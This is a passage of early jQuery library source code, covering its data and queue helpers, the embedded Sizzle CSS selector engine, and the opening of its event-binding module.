		// Compute a unique ID for the element
		if ( !id )
			id = elem[ expando ] = ++uuid;

		// Only generate the data cache if we're
		// trying to access or manipulate it
		if ( name && !jQuery.cache[ id ] )
			jQuery.cache[ id ] = {};

		// Prevent overriding the named cache with undefined values
		if ( data !== undefined )
			jQuery.cache[ id ][ name ] = data;

		// Return the named cache data, or the ID for the element
		return name ?
			jQuery.cache[ id ][ name ] :
			id;
	},

	removeData: function( elem, name ) {
		elem = elem == window ?
			windowData :
			elem;

		var id = elem[ expando ];

		// If we want to remove a specific section of the element's data
		if ( name ) {
			if ( jQuery.cache[ id ] ) {
				// Remove the section of cache data
				delete jQuery.cache[ id ][ name ];

				// If we've removed all the data, remove the element's cache
				name = "";

				for ( name in jQuery.cache[ id ] )
					break;

				if ( !name )
					jQuery.removeData( elem );
			}

		// Otherwise, we want to remove all of the element's data
		} else {
			// Clean up the element expando
			try {
				delete elem[ expando ];
			} catch(e){
				// IE has trouble directly removing the expando
				// but it's ok with using removeAttribute
				if ( elem.removeAttribute )
					elem.removeAttribute( expando );
			}

			// Completely remove the data cache
			delete jQuery.cache[ id ];
		}
	},
	queue: function( elem, type, data ) {
		if ( elem ){
	
			type = (type || "fx") + "queue";
	
			var q = jQuery.data( elem, type );
	
			if ( !q || jQuery.isArray(data) )
				q = jQuery.data( elem, type, jQuery.makeArray(data) );
			else if( data )
				q.push( data );
	
		}
		return q;
	},

	dequeue: function( elem, type ){
		var queue = jQuery.queue( elem, type ),
			fn = queue.shift();
		
		if( !type || type === "fx" )
			fn = queue[0];
			
		if( fn !== undefined )
			fn.call(elem);
	}
});

jQuery.fn.extend({
	data: function( key, value ){
		var parts = key.split(".");
		parts[1] = parts[1] ? "." + parts[1] : "";

		if ( value === undefined ) {
			var data = this.triggerHandler("getData" + parts[1] + "!", [parts[0]]);

			if ( data === undefined && this.length )
				data = jQuery.data( this[0], key );

			return data === undefined && parts[1] ?
				this.data( parts[0] ) :
				data;
		} else
			return this.trigger("setData" + parts[1] + "!", [parts[0], value]).each(function(){
				jQuery.data( this, key, value );
			});
	},

	removeData: function( key ){
		return this.each(function(){
			jQuery.removeData( this, key );
		});
	},
	queue: function(type, data){
		if ( typeof type !== "string" ) {
			data = type;
			type = "fx";
		}

		if ( data === undefined )
			return jQuery.queue( this[0], type );

		return this.each(function(){
			var queue = jQuery.queue( this, type, data );
			
			 if( type == "fx" && queue.length == 1 )
				queue[0].call(this);
		});
	},
	dequeue: function(type){
		return this.each(function(){
			jQuery.dequeue( this, type );
		});
	}
});/*!
 * Sizzle CSS Selector Engine - v0.9.3
 *  Copyright 2009, The Dojo Foundation
 *  Released under the MIT, BSD, and GPL Licenses.
 *  More information: http://sizzlejs.com/
 */
(function(){

var chunker = /((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?/g,
	done = 0,
	toString = Object.prototype.toString;

var Sizzle = function(selector, context, results, seed) {
	results = results || [];
	context = context || document;

	if ( context.nodeType !== 1 && context.nodeType !== 9 )
		return [];
	
	if ( !selector || typeof selector !== "string" ) {
		return results;
	}

	var parts = [], m, set, checkSet, check, mode, extra, prune = true;
	
	// Reset the position of the chunker regexp (start from head)
	chunker.lastIndex = 0;
	
	while ( (m = chunker.exec(selector)) !== null ) {
		parts.push( m[1] );
		
		if ( m[2] ) {
			extra = RegExp.rightContext;
			break;
		}
	}

	if ( parts.length > 1 && origPOS.exec( selector ) ) {
		if ( parts.length === 2 && Expr.relative[ parts[0] ] ) {
			set = posProcess( parts[0] + parts[1], context );
		} else {
			set = Expr.relative[ parts[0] ] ?
				[ context ] :
				Sizzle( parts.shift(), context );

			while ( parts.length ) {
				selector = parts.shift();

				if ( Expr.relative[ selector ] )
					selector += parts.shift();

				set = posProcess( selector, set );
			}
		}
	} else {
		var ret = seed ?
			{ expr: parts.pop(), set: makeArray(seed) } :
			Sizzle.find( parts.pop(), parts.length === 1 && context.parentNode ? context.parentNode : context, isXML(context) );
		set = Sizzle.filter( ret.expr, ret.set );

		if ( parts.length > 0 ) {
			checkSet = makeArray(set);
		} else {
			prune = false;
		}

		while ( parts.length ) {
			var cur = parts.pop(), pop = cur;

			if ( !Expr.relative[ cur ] ) {
				cur = "";
			} else {
				pop = parts.pop();
			}

			if ( pop == null ) {
				pop = context;
			}

			Expr.relative[ cur ]( checkSet, pop, isXML(context) );
		}
	}

	if ( !checkSet ) {
		checkSet = set;
	}

	if ( !checkSet ) {
		throw "Syntax error, unrecognized expression: " + (cur || selector);
	}

	if ( toString.call(checkSet) === "[object Array]" ) {
		if ( !prune ) {
			results.push.apply( results, checkSet );
		} else if ( context.nodeType === 1 ) {
			for ( var i = 0; checkSet[i] != null; i++ ) {
				if ( checkSet[i] && (checkSet[i] === true || checkSet[i].nodeType === 1 && contains(context, checkSet[i])) ) {
					results.push( set[i] );
				}
			}
		} else {
			for ( var i = 0; checkSet[i] != null; i++ ) {
				if ( checkSet[i] && checkSet[i].nodeType === 1 ) {
					results.push( set[i] );
				}
			}
		}
	} else {
		makeArray( checkSet, results );
	}

	if ( extra ) {
		Sizzle( extra, context, results, seed );

		if ( sortOrder ) {
			hasDuplicate = false;
			results.sort(sortOrder);

			if ( hasDuplicate ) {
				for ( var i = 1; i < results.length; i++ ) {
					if ( results[i] === results[i-1] ) {
						results.splice(i--, 1);
					}
				}
			}
		}
	}

	return results;
};

Sizzle.matches = function(expr, set){
	return Sizzle(expr, null, null, set);
};

Sizzle.find = function(expr, context, isXML){
	var set, match;

	if ( !expr ) {
		return [];
	}

	for ( var i = 0, l = Expr.order.length; i < l; i++ ) {
		var type = Expr.order[i], match;
		
		if ( (match = Expr.match[ type ].exec( expr )) ) {
			var left = RegExp.leftContext;

			if ( left.substr( left.length - 1 ) !== "\\" ) {
				match[1] = (match[1] || "").replace(/\\/g, "");
				set = Expr.find[ type ]( match, context, isXML );
				if ( set != null ) {
					expr = expr.replace( Expr.match[ type ], "" );
					break;
				}
			}
		}
	}

	if ( !set ) {
		set = context.getElementsByTagName("*");
	}

	return {set: set, expr: expr};
};

Sizzle.filter = function(expr, set, inplace, not){
	var old = expr, result = [], curLoop = set, match, anyFound,
		isXMLFilter = set && set[0] && isXML(set[0]);

	while ( expr && set.length ) {
		for ( var type in Expr.filter ) {
			if ( (match = Expr.match[ type ].exec( expr )) != null ) {
				var filter = Expr.filter[ type ], found, item;
				anyFound = false;

				if ( curLoop == result ) {
					result = [];
				}

				if ( Expr.preFilter[ type ] ) {
					match = Expr.preFilter[ type ]( match, curLoop, inplace, result, not, isXMLFilter );

					if ( !match ) {
						anyFound = found = true;
					} else if ( match === true ) {
						continue;
					}
				}

				if ( match ) {
					for ( var i = 0; (item = curLoop[i]) != null; i++ ) {
						if ( item ) {
							found = filter( item, match, i, curLoop );
							var pass = not ^ !!found;

							if ( inplace && found != null ) {
								if ( pass ) {
									anyFound = true;
								} else {
									curLoop[i] = false;
								}
							} else if ( pass ) {
								result.push( item );
								anyFound = true;
							}
						}
					}
				}

				if ( found !== undefined ) {
					if ( !inplace ) {
						curLoop = result;
					}

					expr = expr.replace( Expr.match[ type ], "" );

					if ( !anyFound ) {
						return [];
					}

					break;
				}
			}
		}

		// Improper expression
		if ( expr == old ) {
			if ( anyFound == null ) {
				throw "Syntax error, unrecognized expression: " + expr;
			} else {
				break;
			}
		}

		old = expr;
	}

	return curLoop;
};

var Expr = Sizzle.selectors = {
	order: [ "ID", "NAME", "TAG" ],
	match: {
		ID: /#((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,
		CLASS: /\.((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,
		NAME: /\[name=['"]*((?:[\w\u00c0-\uFFFF_-]|\\.)+)['"]*\]/,
		ATTR: /\[\s*((?:[\w\u00c0-\uFFFF_-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,
		TAG: /^((?:[\w\u00c0-\uFFFF\*_-]|\\.)+)/,
		CHILD: /:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,
		POS: /:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,
		PSEUDO: /:((?:[\w\u00c0-\uFFFF_-]|\\.)+)(?:\((['"]*)((?:\([^\)]+\)|[^\2\(\)]*)+)\2\))?/
	},
	attrMap: {
		"class": "className",
		"for": "htmlFor"
	},
	attrHandle: {
		href: function(elem){
			return elem.getAttribute("href");
		}
	},
	relative: {
		"+": function(checkSet, part, isXML){
			var isPartStr = typeof part === "string",
				isTag = isPartStr && !/\W/.test(part),
				isPartStrNotTag = isPartStr && !isTag;

			if ( isTag && !isXML ) {
				part = part.toUpperCase();
			}

			for ( var i = 0, l = checkSet.length, elem; i < l; i++ ) {
				if ( (elem = checkSet[i]) ) {
					while ( (elem = elem.previousSibling) && elem.nodeType !== 1 ) {}

					checkSet[i] = isPartStrNotTag || elem && elem.nodeName === part ?
						elem || false :
						elem === part;
				}
			}

			if ( isPartStrNotTag ) {
				Sizzle.filter( part, checkSet, true );
			}
		},
		">": function(checkSet, part, isXML){
			var isPartStr = typeof part === "string";

			if ( isPartStr && !/\W/.test(part) ) {
				part = isXML ? part : part.toUpperCase();

				for ( var i = 0, l = checkSet.length; i < l; i++ ) {
					var elem = checkSet[i];
					if ( elem ) {
						var parent = elem.parentNode;
						checkSet[i] = parent.nodeName === part ? parent : false;
					}
				}
			} else {
				for ( var i = 0, l = checkSet.length; i < l; i++ ) {
					var elem = checkSet[i];
					if ( elem ) {
						checkSet[i] = isPartStr ?
							elem.parentNode :
							elem.parentNode === part;
					}
				}

				if ( isPartStr ) {
					Sizzle.filter( part, checkSet, true );
				}
			}
		},
		"": function(checkSet, part, isXML){
			var doneName = done++, checkFn = dirCheck;

			if ( !part.match(/\W/) ) {
				var nodeCheck = part = isXML ? part : part.toUpperCase();
				checkFn = dirNodeCheck;
			}

			checkFn("parentNode", part, doneName, checkSet, nodeCheck, isXML);
		},
		"~": function(checkSet, part, isXML){
			var doneName = done++, checkFn = dirCheck;

			if ( typeof part === "string" && !part.match(/\W/) ) {
				var nodeCheck = part = isXML ? part : part.toUpperCase();
				checkFn = dirNodeCheck;
			}

			checkFn("previousSibling", part, doneName, checkSet, nodeCheck, isXML);
		}
	},
	find: {
		ID: function(match, context, isXML){
			if ( typeof context.getElementById !== "undefined" && !isXML ) {
				var m = context.getElementById(match[1]);
				return m ? [m] : [];
			}
		},
		NAME: function(match, context, isXML){
			if ( typeof context.getElementsByName !== "undefined" ) {
				var ret = [], results = context.getElementsByName(match[1]);

				for ( var i = 0, l = results.length; i < l; i++ ) {
					if ( results[i].getAttribute("name") === match[1] ) {
						ret.push( results[i] );
					}
				}

				return ret.length === 0 ? null : ret;
			}
		},
		TAG: function(match, context){
			return context.getElementsByTagName(match[1]);
		}
	},
	preFilter: {
		CLASS: function(match, curLoop, inplace, result, not, isXML){
			match = " " + match[1].replace(/\\/g, "") + " ";

			if ( isXML ) {
				return match;
			}

			for ( var i = 0, elem; (elem = curLoop[i]) != null; i++ ) {
				if ( elem ) {
					if ( not ^ (elem.className && (" " + elem.className + " ").indexOf(match) >= 0) ) {
						if ( !inplace )
							result.push( elem );
					} else if ( inplace ) {
						curLoop[i] = false;
					}
				}
			}

			return false;
		},
		ID: function(match){
			return match[1].replace(/\\/g, "");
		},
		TAG: function(match, curLoop){
			for ( var i = 0; curLoop[i] === false; i++ ){}
			return curLoop[i] && isXML(curLoop[i]) ? match[1] : match[1].toUpperCase();
		},
		CHILD: function(match){
			if ( match[1] == "nth" ) {
				// parse equations like 'even', 'odd', '5', '2n', '3n+2', '4n-1', '-n+6'
				var test = /(-?)(\d*)n((?:\+|-)?\d*)/.exec(
					match[2] == "even" && "2n" || match[2] == "odd" && "2n+1" ||
					!/\D/.test( match[2] ) && "0n+" + match[2] || match[2]);

				// calculate the numbers (first)n+(last) including if they are negative
				match[2] = (test[1] + (test[2] || 1)) - 0;
				match[3] = test[3] - 0;
			}

			// TODO: Move to normal caching system
			match[0] = done++;

			return match;
		},
		ATTR: function(match, curLoop, inplace, result, not, isXML){
			var name = match[1].replace(/\\/g, "");
			
			if ( !isXML && Expr.attrMap[name] ) {
				match[1] = Expr.attrMap[name];
			}

			if ( match[2] === "~=" ) {
				match[4] = " " + match[4] + " ";
			}

			return match;
		},
		PSEUDO: function(match, curLoop, inplace, result, not){
			if ( match[1] === "not" ) {
				// If we're dealing with a complex expression, or a simple one
				if ( match[3].match(chunker).length > 1 || /^\w/.test(match[3]) ) {
					match[3] = Sizzle(match[3], null, null, curLoop);
				} else {
					var ret = Sizzle.filter(match[3], curLoop, inplace, true ^ not);
					if ( !inplace ) {
						result.push.apply( result, ret );
					}
					return false;
				}
			} else if ( Expr.match.POS.test( match[0] ) || Expr.match.CHILD.test( match[0] ) ) {
				return true;
			}
			
			return match;
		},
		POS: function(match){
			match.unshift( true );
			return match;
		}
	},
	filters: {
		enabled: function(elem){
			return elem.disabled === false && elem.type !== "hidden";
		},
		disabled: function(elem){
			return elem.disabled === true;
		},
		checked: function(elem){
			return elem.checked === true;
		},
		selected: function(elem){
			// Accessing this property makes selected-by-default
			// options in Safari work properly
			elem.parentNode.selectedIndex;
			return elem.selected === true;
		},
		parent: function(elem){
			return !!elem.firstChild;
		},
		empty: function(elem){
			return !elem.firstChild;
		},
		has: function(elem, i, match){
			return !!Sizzle( match[3], elem ).length;
		},
		header: function(elem){
			return /h\d/i.test( elem.nodeName );
		},
		text: function(elem){
			return "text" === elem.type;
		},
		radio: function(elem){
			return "radio" === elem.type;
		},
		checkbox: function(elem){
			return "checkbox" === elem.type;
		},
		file: function(elem){
			return "file" === elem.type;
		},
		password: function(elem){
			return "password" === elem.type;
		},
		submit: function(elem){
			return "submit" === elem.type;
		},
		image: function(elem){
			return "image" === elem.type;
		},
		reset: function(elem){
			return "reset" === elem.type;
		},
		button: function(elem){
			return "button" === elem.type || elem.nodeName.toUpperCase() === "BUTTON";
		},
		input: function(elem){
			return /input|select|textarea|button/i.test(elem.nodeName);
		}
	},
	setFilters: {
		first: function(elem, i){
			return i === 0;
		},
		last: function(elem, i, match, array){
			return i === array.length - 1;
		},
		even: function(elem, i){
			return i % 2 === 0;
		},
		odd: function(elem, i){
			return i % 2 === 1;
		},
		lt: function(elem, i, match){
			return i < match[3] - 0;
		},
		gt: function(elem, i, match){
			return i > match[3] - 0;
		},
		nth: function(elem, i, match){
			return match[3] - 0 == i;
		},
		eq: function(elem, i, match){
			return match[3] - 0 == i;
		}
	},
	filter: {
		PSEUDO: function(elem, match, i, array){
			var name = match[1], filter = Expr.filters[ name ];

			if ( filter ) {
				return filter( elem, i, match, array );
			} else if ( name === "contains" ) {
				return (elem.textContent || elem.innerText || "").indexOf(match[3]) >= 0;
			} else if ( name === "not" ) {
				var not = match[3];

				for ( var i = 0, l = not.length; i < l; i++ ) {
					if ( not[i] === elem ) {
						return false;
					}
				}

				return true;
			}
		},
		CHILD: function(elem, match){
			var type = match[1], node = elem;
			switch (type) {
				case 'only':
				case 'first':
					while (node = node.previousSibling)  {
						if ( node.nodeType === 1 ) return false;
					}
					if ( type == 'first') return true;
					node = elem;
				case 'last':
					while (node = node.nextSibling)  {
						if ( node.nodeType === 1 ) return false;
					}
					return true;
				case 'nth':
					var first = match[2], last = match[3];

					if ( first == 1 && last == 0 ) {
						return true;
					}
					
					var doneName = match[0],
						parent = elem.parentNode;
	
					if ( parent && (parent.sizcache !== doneName || !elem.nodeIndex) ) {
						var count = 0;
						for ( node = parent.firstChild; node; node = node.nextSibling ) {
							if ( node.nodeType === 1 ) {
								node.nodeIndex = ++count;
							}
						} 
						parent.sizcache = doneName;
					}
					
					var diff = elem.nodeIndex - last;
					if ( first == 0 ) {
						return diff == 0;
					} else {
						return ( diff % first == 0 && diff / first >= 0 );
					}
			}
		},
		ID: function(elem, match){
			return elem.nodeType === 1 && elem.getAttribute("id") === match;
		},
		TAG: function(elem, match){
			return (match === "*" && elem.nodeType === 1) || elem.nodeName === match;
		},
		CLASS: function(elem, match){
			return (" " + (elem.className || elem.getAttribute("class")) + " ")
				.indexOf( match ) > -1;
		},
		ATTR: function(elem, match){
			var name = match[1],
				result = Expr.attrHandle[ name ] ?
					Expr.attrHandle[ name ]( elem ) :
					elem[ name ] != null ?
						elem[ name ] :
						elem.getAttribute( name ),
				value = result + "",
				type = match[2],
				check = match[4];

			return result == null ?
				type === "!=" :
				type === "=" ?
				value === check :
				type === "*=" ?
				value.indexOf(check) >= 0 :
				type === "~=" ?
				(" " + value + " ").indexOf(check) >= 0 :
				!check ?
				value && result !== false :
				type === "!=" ?
				value != check :
				type === "^=" ?
				value.indexOf(check) === 0 :
				type === "$=" ?
				value.substr(value.length - check.length) === check :
				type === "|=" ?
				value === check || value.substr(0, check.length + 1) === check + "-" :
				false;
		},
		POS: function(elem, match, i, array){
			var name = match[2], filter = Expr.setFilters[ name ];

			if ( filter ) {
				return filter( elem, i, match, array );
			}
		}
	}
};

var origPOS = Expr.match.POS;

for ( var type in Expr.match ) {
	Expr.match[ type ] = RegExp( Expr.match[ type ].source + /(?![^\[]*\])(?![^\(]*\))/.source );
}

var makeArray = function(array, results) {
	array = Array.prototype.slice.call( array );

	if ( results ) {
		results.push.apply( results, array );
		return results;
	}
	
	return array;
};

// Perform a simple check to determine if the browser is capable of
// converting a NodeList to an array using builtin methods.
try {
	Array.prototype.slice.call( document.documentElement.childNodes );

// Provide a fallback method if it does not work
} catch(e){
	makeArray = function(array, results) {
		var ret = results || [];

		if ( toString.call(array) === "[object Array]" ) {
			Array.prototype.push.apply( ret, array );
		} else {
			if ( typeof array.length === "number" ) {
				for ( var i = 0, l = array.length; i < l; i++ ) {
					ret.push( array[i] );
				}
			} else {
				for ( var i = 0; array[i]; i++ ) {
					ret.push( array[i] );
				}
			}
		}

		return ret;
	};
}

var sortOrder;

if ( document.documentElement.compareDocumentPosition ) {
	sortOrder = function( a, b ) {
		var ret = a.compareDocumentPosition(b) & 4 ? -1 : a === b ? 0 : 1;
		if ( ret === 0 ) {
			hasDuplicate = true;
		}
		return ret;
	};
} else if ( "sourceIndex" in document.documentElement ) {
	sortOrder = function( a, b ) {
		var ret = a.sourceIndex - b.sourceIndex;
		if ( ret === 0 ) {
			hasDuplicate = true;
		}
		return ret;
	};
} else if ( document.createRange ) {
	sortOrder = function( a, b ) {
		var aRange = a.ownerDocument.createRange(), bRange = b.ownerDocument.createRange();
		aRange.selectNode(a);
		aRange.collapse(true);
		bRange.selectNode(b);
		bRange.collapse(true);
		var ret = aRange.compareBoundaryPoints(Range.START_TO_END, bRange);
		if ( ret === 0 ) {
			hasDuplicate = true;
		}
		return ret;
	};
}

// Check to see if the browser returns elements by name when
// querying by getElementById (and provide a workaround)
(function(){
	// We're going to inject a fake input element with a specified name
	var form = document.createElement("form"),
		id = "script" + (new Date).getTime();
	form.innerHTML = "<input name='" + id + "'/>";

	// Inject it into the root element, check its status, and remove it quickly
	var root = document.documentElement;
	root.insertBefore( form, root.firstChild );

	// The workaround has to do additional checks after a getElementById
	// Which slows things down for other browsers (hence the branching)
	if ( !!document.getElementById( id ) ) {
		Expr.find.ID = function(match, context, isXML){
			if ( typeof context.getElementById !== "undefined" && !isXML ) {
				var m = context.getElementById(match[1]);
				return m ? m.id === match[1] || typeof m.getAttributeNode !== "undefined" && m.getAttributeNode("id").nodeValue === match[1] ? [m] : undefined : [];
			}
		};

		Expr.filter.ID = function(elem, match){
			var node = typeof elem.getAttributeNode !== "undefined" && elem.getAttributeNode("id");
			return elem.nodeType === 1 && node && node.nodeValue === match;
		};
	}

	root.removeChild( form );
})();

(function(){
	// Check to see if the browser returns only elements
	// when doing getElementsByTagName("*")

	// Create a fake element
	var div = document.createElement("div");
	div.appendChild( document.createComment("") );

	// Make sure no comments are found
	if ( div.getElementsByTagName("*").length > 0 ) {
		Expr.find.TAG = function(match, context){
			var results = context.getElementsByTagName(match[1]);

			// Filter out possible comments
			if ( match[1] === "*" ) {
				var tmp = [];

				for ( var i = 0; results[i]; i++ ) {
					if ( results[i].nodeType === 1 ) {
						tmp.push( results[i] );
					}
				}

				results = tmp;
			}

			return results;
		};
	}

	// Check to see if an attribute returns normalized href attributes
	div.innerHTML = "<a href='#'></a>";
	if ( div.firstChild && typeof div.firstChild.getAttribute !== "undefined" &&
			div.firstChild.getAttribute("href") !== "#" ) {
		Expr.attrHandle.href = function(elem){
			return elem.getAttribute("href", 2);
		};
	}
})();

if ( document.querySelectorAll ) (function(){
	var oldSizzle = Sizzle, div = document.createElement("div");
	div.innerHTML = "<p class='TEST'></p>";

	// Safari can't handle uppercase or unicode characters when
	// in quirks mode.
	if ( div.querySelectorAll && div.querySelectorAll(".TEST").length === 0 ) {
		return;
	}
	
	Sizzle = function(query, context, extra, seed){
		context = context || document;

		// Only use querySelectorAll on non-XML documents
		// (ID selectors don't work in non-HTML documents)
		if ( !seed && context.nodeType === 9 && !isXML(context) ) {
			try {
				return makeArray( context.querySelectorAll(query), extra );
			} catch(e){}
		}
		
		return oldSizzle(query, context, extra, seed);
	};

	Sizzle.find = oldSizzle.find;
	Sizzle.filter = oldSizzle.filter;
	Sizzle.selectors = oldSizzle.selectors;
	Sizzle.matches = oldSizzle.matches;
})();

if ( document.getElementsByClassName && document.documentElement.getElementsByClassName ) (function(){
	var div = document.createElement("div");
	div.innerHTML = "<div class='test e'></div><div class='test'></div>";

	// Opera can't find a second classname (in 9.6)
	if ( div.getElementsByClassName("e").length === 0 )
		return;

	// Safari caches class attributes, doesn't catch changes (in 3.2)
	div.lastChild.className = "e";

	if ( div.getElementsByClassName("e").length === 1 )
		return;

	Expr.order.splice(1, 0, "CLASS");
	Expr.find.CLASS = function(match, context, isXML) {
		if ( typeof context.getElementsByClassName !== "undefined" && !isXML ) {
			return context.getElementsByClassName(match[1]);
		}
	};
})();

function dirNodeCheck( dir, cur, doneName, checkSet, nodeCheck, isXML ) {
	var sibDir = dir == "previousSibling" && !isXML;
	for ( var i = 0, l = checkSet.length; i < l; i++ ) {
		var elem = checkSet[i];
		if ( elem ) {
			if ( sibDir && elem.nodeType === 1 ){
				elem.sizcache = doneName;
				elem.sizset = i;
			}
			elem = elem[dir];
			var match = false;

			while ( elem ) {
				if ( elem.sizcache === doneName ) {
					match = checkSet[elem.sizset];
					break;
				}

				if ( elem.nodeType === 1 && !isXML ){
					elem.sizcache = doneName;
					elem.sizset = i;
				}

				if ( elem.nodeName === cur ) {
					match = elem;
					break;
				}

				elem = elem[dir];
			}

			checkSet[i] = match;
		}
	}
}

function dirCheck( dir, cur, doneName, checkSet, nodeCheck, isXML ) {
	var sibDir = dir == "previousSibling" && !isXML;
	for ( var i = 0, l = checkSet.length; i < l; i++ ) {
		var elem = checkSet[i];
		if ( elem ) {
			if ( sibDir && elem.nodeType === 1 ) {
				elem.sizcache = doneName;
				elem.sizset = i;
			}
			elem = elem[dir];
			var match = false;

			while ( elem ) {
				if ( elem.sizcache === doneName ) {
					match = checkSet[elem.sizset];
					break;
				}

				if ( elem.nodeType === 1 ) {
					if ( !isXML ) {
						elem.sizcache = doneName;
						elem.sizset = i;
					}
					if ( typeof cur !== "string" ) {
						if ( elem === cur ) {
							match = true;
							break;
						}

					} else if ( Sizzle.filter( cur, [elem] ).length > 0 ) {
						match = elem;
						break;
					}
				}

				elem = elem[dir];
			}

			checkSet[i] = match;
		}
	}
}

var contains = document.compareDocumentPosition ?  function(a, b){
	return a.compareDocumentPosition(b) & 16;
} : function(a, b){
	return a !== b && (a.contains ? a.contains(b) : true);
};

var isXML = function(elem){
	return elem.nodeType === 9 && elem.documentElement.nodeName !== "HTML" ||
		!!elem.ownerDocument && isXML( elem.ownerDocument );
};

var posProcess = function(selector, context){
	var tmpSet = [], later = "", match,
		root = context.nodeType ? [context] : context;

	// Position selectors must be done after the filter
	// And so must :not(positional) so we move all PSEUDOs to the end
	while ( (match = Expr.match.PSEUDO.exec( selector )) ) {
		later += match[0];
		selector = selector.replace( Expr.match.PSEUDO, "" );
	}

	selector = Expr.relative[selector] ? selector + "*" : selector;

	for ( var i = 0, l = root.length; i < l; i++ ) {
		Sizzle( selector, root[i], tmpSet );
	}

	return Sizzle.filter( later, tmpSet );
};

// EXPOSE
jQuery.find = Sizzle;
jQuery.filter = Sizzle.filter;
jQuery.expr = Sizzle.selectors;
jQuery.expr[":"] = jQuery.expr.filters;

Sizzle.selectors.filters.hidden = function(elem){
	return elem.offsetWidth === 0 || elem.offsetHeight === 0;
};

Sizzle.selectors.filters.visible = function(elem){
	return elem.offsetWidth > 0 || elem.offsetHeight > 0;
};

Sizzle.selectors.filters.animated = function(elem){
	return jQuery.grep(jQuery.timers, function(fn){
		return elem === fn.elem;
	}).length;
};

jQuery.multiFilter = function( expr, elems, not ) {
	if ( not ) {
		expr = ":not(" + expr + ")";
	}

	return Sizzle.matches(expr, elems);
};

jQuery.dir = function( elem, dir ){
	var matched = [], cur = elem[dir];
	while ( cur && cur != document ) {
		if ( cur.nodeType == 1 )
			matched.push( cur );
		cur = cur[dir];
	}
	return matched;
};

jQuery.nth = function(cur, result, dir, elem){
	result = result || 1;
	var num = 0;

	for ( ; cur; cur = cur[dir] )
		if ( cur.nodeType == 1 && ++num == result )
			break;

	return cur;
};

jQuery.sibling = function(n, elem){
	var r = [];

	for ( ; n; n = n.nextSibling ) {
		if ( n.nodeType == 1 && n != elem )
			r.push( n );
	}

	return r;
};

return;

window.Sizzle = Sizzle;

})();
/*
 * A number of helper functions used for managing events.
 * Many of the ideas behind this code originated from
 * Dean Edwards' addEvent library.
 */
jQuery.event = {

	// Bind an event to an element
	// Original by Dean Edwards
	add: function(elem, types, handler, data) {
		if ( elem.nodeType == 3 || elem.nodeType == 8 )
			return;

		// For whatever reason, IE has trouble passing the window object
		// around, causing it to be cloned in the process
		if ( elem.setInterval && elem != window )
			elem = window;

		// Make sure that the function being executed has a unique ID
		if ( !handler.guid )
			handler.guid = this.guid++;

		// if data is passed, bind to handler
		if ( data !== undefined ) {
			// Create temporary function pointer to original handler
			var fn = handler;

			// Create unique handler function, wrapped around original handler
			handler = this.proxy( fn );

			// Store data in unique handler
			handler.data = data;
		}

		// Init the element's event structure
		var events = jQuery.data(elem, "events") || jQuery.data(elem, "events", {}),
			handle = jQuery.data(elem, "handle") || jQuery.data(elem, "handle", function(){
				// Handle the second event of a trigger and when
				// an event is called after a page has unloaded
				return typeof jQuery !== "undefined" && !jQuery.event.triggered ?
					jQuery.event.handle.apply(arguments.callee.elem, arguments) :
					undefined;
			});
		// Add elem as a property of the handle function
		// This is to prevent a memory leak with non-native
		// event in IE.
		handle.elem = elem;

		// Handle multiple events separated by a space
		// jQuery(...).bind("mouseover mouseout", fn);
		jQuery.each(types.split(/\s+/), function(index, type) {
			// Namespaced event handlers
			var namespaces = type.split(".");
			type = namespaces.shift();
			handler.type = namespaces.slice().sort().join(".");

			// Get the current list of functions bound to this event
			var handlers = events[type];
			
			if ( jQuery.event.specialAll[type] )
				jQuery.event.specialAll[type].setup.call(elem, data, namespaces);

			// Init the event handler queue
			if (!handlers) {
				handlers = events[type] = {};

				// Check for a special event handler
				// Only use addEventListener/attachEvent if the special
				// events handler returns false
				if ( !jQuery.event.special[type] || jQuery.event.special[type].setup.call(elem, data, namespaces) === false ) {
					// Bind the global event handler to the element
					if (elem.addEventListener)
						elem.addEventListener(type, handle, false);
					else if (elem.attachEvent)
						elem.attachEvent("on" + type, handle);
				}
			}

			// Add the function to the element's handler list
			handlers[handler.guid] = handler;

			// Keep track of which events have been used, for global triggering
			jQuery.event.global[type] = true;
		});

		// Nullify elem to prevent memory leaks in IE
		elem = null;
	},

	guid: 1,
	global: {},

	// Detach an event or set of events from an element
	remove: function(elem, types, handler) {
		// don't do events on text and comment nodes
		if ( elem.nodeType == 3 || elem.nodeType == 8 )
			return;

		var events = jQuery.data(elem, "events"), ret, index;

		if ( events ) {
			// Unbind all events for the element
			if ( types === undefined || (typeof types === "string" && types.charAt(0) == ".") )
				for ( var type in events )
					this.remove( elem, type + (types || "") );
			else {
				// types is actually an event object here
				if ( types.type ) {
					handler = types.handler;
					types = types.type;
				}

				// Handle multiple events seperated by a space
				// jQuery(...).unbind("mouseover mouseout", fn);
				jQuery.each(types.split(/\s+/), function(index, type){
					// Namespaced event handlers
					var namespaces = type.split(".");
					type = namespaces.shift();
					var namespace = RegExp("(^|\\.)" + namespaces.slice().sort().join(".*\\.") + "(\\.|$)");

					if ( events[type] ) {
						// remove the given handler for the given type
						if ( handler )
							delete events[type][handler.guid];

						// remove all handlers for the given type
						else
							for ( var handle in events[type] )
								// Handle the removal of namespaced events
								if ( namespace.test(events[type][handle].type) )
									delete events[type][handle];
									
						if ( jQuery.event.specialAll[type] )
							jQuery.event.specialAll[type].teardown.call(elem, namespaces);

						// remove generic event handler if no more handlers exist
						for ( ret in events[type] ) break;
						if ( !ret ) {
							if ( !jQuery.event.special[type] || jQuery.event.special[type].teardown.call(elem, namespaces) === false ) {
								if (elem.removeEventListener)
									elem.removeEventListener(type, jQuery.data(elem, "handle"), false);
								else if (elem.detachEvent)
									elem.detachEvent("on" + type, jQuery.data(elem, "handle"));
							}
							ret = null;
							delete events[type];
						}
					}
				});
			}

			// Remove the expando if it's no longer used
			for ( ret in events ) break;
			if ( !ret ) {
				var handle = jQuery.data( elem, "handle" );
				if ( handle ) handle.elem = null;
				jQuery.removeData( elem, "events" );
				jQuery.removeData( elem, "handle" );
			}
		}
	},

	// bubbling is internal
	trigger: function( event, data, elem, bubbling ) {
		// Event object or event type
		var type = event.type || event;

		if( !bubbling ){
